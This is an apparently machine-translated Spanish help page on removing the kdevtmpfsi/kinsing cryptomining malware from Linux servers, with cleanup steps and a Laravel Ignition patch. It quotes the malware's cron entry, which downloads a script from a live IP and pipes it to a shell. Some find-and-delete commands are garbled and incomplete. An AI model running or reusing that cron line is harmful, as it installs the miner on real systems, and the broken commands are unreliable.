Mantén la atención ya que en este artículo vas a hallar el arreglo que buscas.
Solución:
Lo enfrenté cara a cara después de instalar y ejecutar Flink Cluster. Parece que recibimos un ataque de un malware, que intenta usar la CPU de nuestro servidor para ejecutar el programa para extraer la moneda.
Mi solución es seguir los pasos:
-
Mata el programa que se está ejecutando primero:
- Correr
htop
y luego presione F9 para matar el programa. tenemos que matarkdevtmpfsi
ykinsing
así como.
- Correr
-
Elimine el archivo de malware que se ejecutará y usará toda la CPU (con mi centos 7)
find / -iname kdevtmpfsi -exec rm -fv ;
find / -iname kinsing -exec rm -fv ;
El resultado debería ser:
/tmp/kdevtmpfsi is removed
/var/tmp/kinsing is removed
- Crear un archivo con el mismo nombre:
-
touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing
-
echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
-
echo "kinsing is fine now" > /var/tmp/kinsing
-
Ahora haga que dos archivos sean de solo lectura con el siguiente comando:
chattr +i /tmp/kdevtmpfsi
chattr +i /var/tmp/kinsing
** Debe reiniciar su servidor. Si su problema está en un servidor remoto y se está conectando a él con un puerto específico, ¡puede cambiar al puerto ssh para aumentar la seguridad!
Tuve el mismo problema con Laravel en Centos 8. Estos son los pasos que seguí para eliminar el malware y parchear el sistema.
Eliminar el malware de los pasos del sistema:
Paso 1:
Eliminar el software malicioso:
Mata a los dos procesos (kdevtmpfsi
y kinsing
-Pueden estar en el mismo nombre pero con caracteres aleatorios al final-) usando htop
o cualquier otro gestor de procesos.
Utilice lo siguiente para buscar y eliminar los archivos:
# find / -iname kdevtmpfsi* -exec rm -fv ;
# find / -iname kinsing* -exec rm -fv ;
La salida debería verse como:
removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'
Paso 2:
Compruebe si hay un trabajo cron:
verifique si hay un trabajo cron que reinicializaría el malware.
Encontré el mío en: /var/spool/cron/apache
Incluía lo siguiente:* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
Paso 3:
Cree nuevos archivos y hágalos de solo lectura:
# touch /tmp/kdevtmpfsi && touch /tmp/kinsing
# echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
# echo "kinsing is fine now" > /tmp/kinsing
# chmod 0444 /tmp/kdevtmpfsi
# chmod 0444 /tmp/kinsing
Parcheando el proyecto Laravel:
Paso 1:
Apague APP_DEBUG:
asegúrese de que el APP_DEBUG
attribute es false
en .env
porque así es como se accede a la vulnerabilidad.
Paso 2:
Actualizar encendido:
Actualizar encendido a una versión superior a 2.5.1
para asegurarse de que la vulnerabilidad está parcheada.
ejecute lo siguiente en la carpeta de su proyecto:
$ composer update facade/ignition
La solución mencionada aquí funcionó para nosotros. Básicamente, crea los archivos que usa el minero, sin ningún derecho, por lo que el minero no puede crearlos ni usarlos. https://github.com/docker-library/redis/issues/217
touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing
echo "everything is good here" > /tmp/kdevtmpfsi
echo "everything is good here" > /var/tmp/kinsing
touch /tmp/zzz
echo "everything is good here" > /tmp/zzz
chmod go-rwx /var/tmp
chmod 1777 /tmp
Si tienes alguna cuestión y disposición de acrecentar nuestro división te recordamos ejecutar una aclaración y con gusto lo observaremos.